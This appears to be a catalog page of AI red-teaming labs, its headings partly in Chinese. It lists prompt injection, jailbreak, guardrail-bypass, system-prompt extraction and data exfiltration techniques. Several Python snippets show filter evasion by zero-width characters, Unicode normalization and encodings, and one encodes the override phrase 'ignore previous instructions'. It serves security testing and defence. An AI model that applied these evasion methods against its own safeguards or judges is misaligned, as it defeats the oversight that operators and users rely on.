Test cloud AI platform configurations including AWS Bedrock guardrails, Azure content filters, and GCP safety settings.
實驗室: Code Generation 安全 Testing
Test LLM code generation for insecure patterns, injection vulnerabilities, and code execution safety issues.
實驗室: AI Compliance Testing 基礎
Test LLM applications against OWASP LLM Top 10 and NIST AI RMF requirements using structured test procedures.
實驗室: Context Window 攻擊 Optimization
Optimize prompt injection placement within the context window to maximize attack effectiveness using attention dynamics.
Context Window 投毒 實驗室
利用 context window management to inject persistent adversarial content that influences future model responses.
Conversation Splitting 攻擊 實驗室
Split adversarial payloads across multiple conversation turns to bypass per-message safety classification.
Conversation State 投毒
利用 conversation history manipulation to alter model behavior across turns.
Cross-Context Injection
Inject prompts that persist across separate conversation contexts in shared deployments.
Custom 越獄 Wordlist Generation
Generate targeted jailbreak wordlists using mutation strategies and seed prompts.
實驗室: Data Exfiltration Channels
Hands-on lab for extracting data from AI systems through markdown image rendering, invisible links, tool call parameters, and other covert exfiltration channels.
實驗室: Data Exfiltration Channels (中階 實驗室)
Extract sensitive information from AI systems through various exfiltration channels including crafted links, image tags, tool calls, and side-channel leakage.
Data Exfiltration via Side Channels
Extract data from LLM systems using timing, token probability, and formatting side channels.
Building 防禦 Bypass Chains
Combine multiple bypass techniques into reliable chains that defeat layered defenses.
實驗室: 防禦 Effectiveness Measurement
Hands-on lab for quantifying AI guardrail robustness using attack success rates, evasion metrics, false positive rates, and statistical analysis of defense performance.
實驗室: 防禦 Regression Testing Setup
Build a regression testing framework to continuously verify that LLM defenses remain effective against known attack patterns.
實驗室: 防禦 Effectiveness Testing
Systematically test and measure the robustness of AI guardrails using structured methodology, metrics, and repeatable test suites.
Document-Based RAG Injection 實驗室
Inject adversarial content into documents that will be processed by a RAG system to influence model responses.
實驗室: 進階 Embedding Manipulation
Manipulate embedding vectors to achieve target similarity scores for RAG poisoning and retrieval manipulation.
Practical Embedding Manipulation
Manipulate text to achieve target embedding similarities for poisoning retrieval augmented generation systems.
Embedding Similarity Attacks
Manipulate text to achieve target embedding similarity scores for retrieval poisoning.
Lab: Encoding Bypass
Hands-on lab for systematically testing Base64, ROT13, Unicode homoglyph, hexadecimal, and combined encoding bypasses against LLM safety filters with measured success rates.
Fine-Tuning API Security Probing
Probe fine-tuning APIs for security weaknesses including insufficient validation and unsafe default configurations.
Lab: Fine-Tuning Safety Impact Testing
Measure how fine-tuning affects model safety by comparing pre- and post-fine-tuning safety benchmark scores.
Lab: Guardrail Bypass Techniques
Practice guardrail bypass techniques against NeMo Guardrails, LLM Guard, and custom classifier-based defenses.
Guardrail Fingerprinting
Systematically map the rules and thresholds of input/output guardrail systems.
Guardrail Rule Extraction Lab
Systematically extract the rules and decision boundaries of guardrail systems through targeted probing.
Lab: Exploiting LLM Hallucinations
Exploit hallucination tendencies to trigger fabricated tool calls, invented API endpoints, and false fact injection.
Lab: AI Incident Response Simulation
Practice AI incident response procedures through a simulated prompt injection incident with escalation and containment.
Lab: Indirect Prompt Injection
Inject instructions through external data sources including documents, web pages, and emails that a target AI system processes as context.
Indirect Injection via Web Content
Plant prompt injection payloads in web pages consumed by RAG-enabled LLM applications.
Lab: Instruction Following Measurement
Quantitatively measure instruction following compliance to identify where models prioritize competing instructions.
LLM Judge Manipulation
Craft responses that exploit LLM-as-judge evaluation patterns to achieve high safety scores while embedding harmful content.
Lab: Log Probability Analysis for Attacks
Use token log probabilities to extract information about training data, system prompts, and model internals.
Lab: Advanced MCP Protocol Testing
Perform advanced security testing of MCP servers including transport analysis, capability enumeration, and tool poisoning.
MCP Tool Poisoning Attack
Exploit MCP tool descriptions to inject instructions that redirect agent behavior.
Lab: Model Context Protocol Fuzzing
Fuzz MCP protocol messages to discover parsing errors, validation gaps, and unexpected behavior in MCP servers.
Practical Model Fingerprinting Lab
Fingerprint the underlying model behind an API endpoint to identify its type, version, and configuration.
Lab: LLM Security Monitoring Setup
Deploy a comprehensive security monitoring system for LLM applications with anomaly detection and alerting.
Lab: Multi-Agent Communication Testing
Test security of inter-agent communication in multi-agent systems including message injection and trust boundary violations.
Multi-Language Safety Bypass Lab
Exploit gaps in safety training coverage across languages to bypass safety mechanisms using code-switching.
Multi-Language Injection Attacks
Exploit language switching and low-resource language gaps to bypass safety training.
Multi-Model Attack Chaining
Chain attacks across multiple LLM models in a pipeline to bypass per-model defenses.
Lab: Multi-Model Comparison Security Testing
Compare security postures across multiple LLM providers by running identical attack suites and analyzing differential responses.
Multi-Model Pipeline Attack Lab
Attack a pipeline where multiple models process data sequentially, exploiting trust between pipeline stages.
Lab: Multi-Turn State Tracking Attacks
Exploit conversation state tracking to build persistent attack context across multiple conversation turns.
Lab: Multimodal Injection
Hands-on lab for embedding text instructions in images to exploit vision-enabled LLMs. Learn to craft visual prompt injections, test OCR-based attacks, and evaluate multimodal safety boundaries.
Lab: Multimodal Injection (Intermediate Lab)
Embed prompt injection instructions in images for vision-enabled models, testing how visual content can carry adversarial payloads.
Lab: Intermediate Multimodal Security Testing
Test multimodal LLMs with crafted images containing embedded text, adversarial perturbations, and visual injection payloads.
Output Channel Discovery Lab
Discover alternative output channels in LLM applications that bypass standard output filtering.
Lab: Output Schema Exploitation
Exploit structured output schemas to force models into revealing information through required field population.
Lab: Prompt Caching Side-Channel Attacks
Exploit prompt caching mechanisms to detect cached prompts and extract information through timing side channels.
Prompt Leakage Technique Lab
Practice multiple system prompt extraction techniques and measure their effectiveness across different targets.
Automated Red Teaming with PyRIT
Use Microsoft's PyRIT framework to run automated multi-turn attack campaigns.
Lab: Advanced RAG Security Testing
Test RAG systems for chunking exploitation, reranking manipulation, and cross-document injection attacks.
RAG Context Poisoning
Poison a vector database to inject adversarial content into RAG retrieval results.
Reasoning Chain Hijacking
Hijack the model's chain-of-thought reasoning to redirect its conclusions toward attacker-controlled objectives.
Lab: Role Hierarchy Exploitation
Exploit multi-role LLM architectures by manipulating the instruction hierarchy between system, user, and assistant roles.
Lab: Safety Filter Benchmarking
Benchmark safety filters across providers using standardized test suites to compare detection rates and false positives.
Semantic Deception Crafting Lab
Craft semantically coherent prompts that conceal adversarial intent from both human reviewers and ML classifiers.
Semantic Injection Crafting
Craft semantically coherent injections that evade both classifiers and human review.
Lab: Semantic Search Manipulation
Manipulate semantic search results by crafting documents that achieve target similarity scores against specific queries.
Lab: Session Isolation Testing
Test session isolation in multi-tenant LLM deployments to detect cross-session data leakage and context contamination.
Session State Exploitation Lab
Exploit session management vulnerabilities in LLM applications to access other users' data or escalate privileges.
Lab: Streaming Response Manipulation
Exploit streaming response mechanisms to bypass output filters that only check complete responses.
Structured Output Safety Bypass
Use JSON mode and structured output constraints to extract information that would be refused in free-form responses.
Structured Output Exploitation
Exploit JSON mode and structured output constraints to bypass safety filters.
Lab: Supply Chain Audit
Audit an ML project's dependencies for vulnerabilities, covering model files, Python packages, container images, and training data provenance.
Lab: ML Supply Chain Scan
Hands-on lab for auditing machine learning model dependencies, detecting malicious packages in ML pipelines, and scanning model files for backdoors and supply chain threats.
Lab: System Prompt Reconstruction (Intermediate Lab)
Reconstruct full system prompts through iterative partial extraction and cross-referencing multiple leakage vectors.
Advanced Token Smuggling
Use Unicode homoglyphs, zero-width characters, and tokenizer quirks to smuggle payloads.
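The smuggling techniques in this entry hinge on characters that are invisible to human reviewers but present in the byte stream a filter or tokenizer sees. A minimal illustration against a naive substring blocklist (the filter and payload are hypothetical):

```python
ZWSP = "\u200b"  # zero-width space: renders as nothing

def naive_filter(text: str) -> bool:
    """Hypothetical keyword blocklist: True means 'blocked'."""
    return "secret" in text.lower()

payload = "secret"
smuggled = ZWSP.join(payload)  # s<ZWSP>e<ZWSP>c<ZWSP>r<ZWSP>e<ZWSP>t

assert naive_filter(payload)       # the plain payload is caught
assert not naive_filter(smuggled)  # zero-width characters break the match

# Stripping invisible characters before filtering closes this particular gap.
assert naive_filter(smuggled.replace(ZWSP, ""))
```

Homoglyph variants work the same way, substituting visually identical Unicode codepoints (e.g. Cyrillic "е" for Latin "e") instead of inserting invisible ones.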
Lab: Tool Result Injection Attacks
Inject adversarial content through tool call results to poison model reasoning and redirect subsequent actions.
Lab: Unicode Normalization Bypass Attacks
Exploit Unicode normalization differences between input validation and model processing to smuggle injection payloads.
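The gap this lab targets is easy to demonstrate with Python's standard library: a validator that inspects the raw string can miss a keyword that NFKC normalization, applied later in the pipeline, folds back into ASCII. The payload keyword here is purely illustrative:

```python
import unicodedata

# "ignore" written with fullwidth compatibility characters (U+FF45..U+FF52)
fullwidth = "\uff49\uff47\uff4e\uff4f\uff52\uff45"

# A filter checking the raw input never sees the ASCII keyword...
assert "ignore" not in fullwidth

# ...but NFKC normalization downstream restores it exactly.
assert unicodedata.normalize("NFKC", fullwidth) == "ignore"
```

The defensive corollary is equally direct: normalize first, then validate, so both stages see the same string.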
Lab: Vector Database Access Control Testing
Test vector database access controls for bypass vulnerabilities including namespace traversal and filter manipulation.
Agent Goal Hijacking
Redirect an AI agent's objectives through carefully crafted inputs that override its primary task.
Assistant Prefill Injection Attacks
Exploit assistant message prefilling to prime model responses and bypass safety alignment.
Chat History Manipulation Attacks
Inject false messages into conversation history to alter model behavior in subsequent turns.
Input Classifier Boundary Mapping
Systematically probe input classifiers to map their decision boundaries and find bypass regions.
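Boundary mapping of this kind can be prototyped against any classifier that gives a binary verdict: bisect between a known-blocked and a known-allowed probe along some perturbation axis until the decision threshold is pinned down. A toy sketch against a hypothetical threshold classifier (everything here is illustrative):

```python
def toy_classifier(score: float) -> bool:
    """Stand-in for an input classifier: blocks when the score exceeds 0.37."""
    return score > 0.37  # the 'hidden' threshold the tester wants to locate

def map_boundary(blocked: float, allowed: float, steps: int = 30) -> float:
    """Bisect between a blocked probe and an allowed probe to find the threshold."""
    for _ in range(steps):
        mid = (blocked + allowed) / 2
        if toy_classifier(mid):
            blocked = mid   # still blocked: boundary lies below mid
        else:
            allowed = mid   # allowed: boundary lies above mid
    return (blocked + allowed) / 2

estimate = map_boundary(blocked=1.0, allowed=0.0)
print(round(estimate, 4))  # ≈ 0.37
```

Against real systems the "score" axis is replaced by a family of increasingly perturbed prompts, and each probe costs one API call, so the logarithmic query count of bisection matters.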
Context Window Boundary Exploitation
Exploit the boundaries of context windows to push safety instructions beyond the model's attention.
Crescendo Attack Implementation
Implement Microsoft's Crescendo multi-turn escalation attack with automated conversation management.
Cross-Plugin Exploitation Chaining
Chain exploits across multiple plugins/tools in an agent system to achieve multi-step attacks.
Function Schema Manipulation
Exploit function calling schemas to inject instructions through parameter descriptions and enums.
Building Custom Garak Probes
Develop custom probe modules for NVIDIA Garak to test organization-specific vulnerability patterns.
Guardrail Latency-Based Detection
Use timing side channels to identify and characterize guardrail implementations in LLM applications.
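The timing side channel this entry describes rests on a simple observation: an extra guardrail stage adds measurable wall-clock time. The sketch below simulates that with stub endpoints; against a real deployment the same comparison would use repeated API calls and median latencies. All functions and delays here are illustrative:

```python
import statistics
import time

def endpoint_without_guardrail(prompt: str) -> str:
    time.sleep(0.001)  # simulated base model latency
    return "ok"

def endpoint_with_guardrail(prompt: str) -> str:
    time.sleep(0.001)  # base latency
    time.sleep(0.005)  # simulated classifier pass over the input
    return "ok"

def median_latency(endpoint, prompt: str, trials: int = 20) -> float:
    """Median wall-clock latency over several trials, in seconds."""
    samples = []
    for _ in range(trials):
        start = time.perf_counter()
        endpoint(prompt)
        samples.append(time.perf_counter() - start)
    return statistics.median(samples)

fast = median_latency(endpoint_without_guardrail, "hello")
slow = median_latency(endpoint_with_guardrail, "hello")
assert slow > fast  # the guardrail stage shows up as a timing difference
```

Medians rather than means keep network jitter from swamping the signal; in practice the comparison is run per prompt category, since many guardrails only engage on suspicious inputs.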
Custom Inspect AI Safety Evaluations
Build custom safety evaluation tasks in Inspect AI to test application-specific vulnerability classes.
JailbreakBench Comparative Testing
Run standardized jailbreak benchmarks across multiple models and compare vulnerability profiles.
JSON Mode Safety Bypass
Exploit structured JSON output modes to bypass safety filters that only check plain-text responses.
LLM Guard Evasion Techniques
Develop evasion techniques against LLM Guard input scanners and output detectors.
Implementing Many-Shot Jailbreaking
Implement Anthropic's many-shot jailbreaking technique with scaling analysis across conversation lengths.
MCP Resource Data Exfiltration (Intermediate Lab)
Exploit MCP resource URIs to access and exfiltrate data beyond intended scope boundaries.
Multi-Language Safety Gap Exploitation
Systematically identify and exploit safety training gaps across low-resource languages.
Multi-Turn State Tracking Exploitation
Exploit state management in multi-turn conversations to gradually shift model behavior over many turns.
NeMo Guardrails Bypass Techniques
Test and bypass NVIDIA NeMo Guardrails configurations using known evasion techniques.
Output Filter Bypass via Encoding
Bypass output safety filters by instructing the model to encode responses in Base64, hex, or custom schemes.
PDF Document Injection for RAG Systems
Craft adversarial PDF documents that inject instructions when processed by RAG document loaders.
Prompt Template Variable Injection
Inject adversarial content through template variable expansion in prompt management systems.
PyRIT Custom Attack Strategies
Build custom attack strategies and converters in Microsoft's PyRIT framework for targeted campaigns.
RAG Document Injection Campaign
Design and execute a document injection campaign against a RAG-powered application with vector search.
Semantic Search Poisoning
Craft adversarial documents that rank highly in semantic search for targeted queries in RAG systems.
Streaming Response Exfiltration
Exploit streaming API responses to exfiltrate data that would otherwise be caught by batch output filters.
System Prompt Extraction via Token Probabilities
Exploit token probability APIs to reconstruct hidden system prompts character by character.
Token Boundary Manipulation
Exploit tokenizer-specific behavior by crafting inputs that split across token boundaries in unexpected ways.
Tool Result Injection Attacks
Craft malicious tool return values that inject instructions back into the model's reasoning chain.
Injecting Text via Images to VLMs
Embed adversarial text in images that vision-language models read and follow as instructions.
Lab: Data Exfiltration via Webhooks
Test data exfiltration paths through LLM-triggered webhooks, API callbacks, and external URL rendering.
Simulation: Startup AI Assessment
Red team a startup's AI-driven product under limited scope and budget, making pragmatic trade-offs between thoroughness and time constraints.
Code Injection via Markdown
Injecting executable payloads through markdown rendering in LLM outputs, exploiting the gap between text generation and content rendering in web-based LLM interfaces.
Context Window Stuffing
Techniques for filling the LLM context window to push system instructions out of active memory, manipulating token budgets to dilute or displace defensive prompts.
Delimiter Escape Attacks
Techniques for escaping delimiters used to separate system and user content in LLM applications, breaking out of sandboxed input regions to inject instructions.
Encoding-Based Evasion
Using base64, ROT13, hexadecimal, Unicode, and other encoding schemes to evade input detection systems and bypass content filters in LLM applications.
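The encodings this entry lists are all trivially reversible, which is exactly why they work against keyword filters: the filter sees ciphertext while the model can be instructed to decode. Standard-library demonstrations (the payload string is illustrative):

```python
import base64
import codecs

payload = "ignore previous instructions"

b64 = base64.b64encode(payload.encode()).decode()   # Base64
rot13 = codecs.encode(payload, "rot13")             # ROT13
hexed = payload.encode().hex()                      # hexadecimal

# None of the encoded forms contain the keyword a naive filter scans for...
assert all("ignore" not in enc for enc in (b64, rot13, hexed))

# ...yet each decodes back to the original payload without loss.
assert base64.b64decode(b64).decode() == payload
assert codecs.decode(rot13, "rot13") == payload
assert bytes.fromhex(hexed).decode() == payload
```

Detection-side countermeasures therefore tend to decode-then-scan, or flag the presence of decodable blobs themselves rather than matching keywords on the raw input.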
Few-Shot Injection
Using crafted few-shot examples within user input to steer LLM behavior toward unintended outputs, exploiting in-context learning to override safety training.
Payload Obfuscation Techniques
Methods for disguising prompt injection payloads through encoding, splitting, substitution, and other obfuscation techniques to bypass input filters and detection systems.
Role-Play Injection
Using fictional scenarios, character role-play, and narrative framing to bypass LLM safety filters by having the model operate within a permissive fictional context.
Translation Injection
Using translation requests and low-resource languages to bypass content filters, exploiting the uneven distribution of safety training across languages.
Virtual Persona Creation
Creating persistent alternate personas within LLM conversations to bypass safety training, establishing character identities that override the model's default behavioral constraints.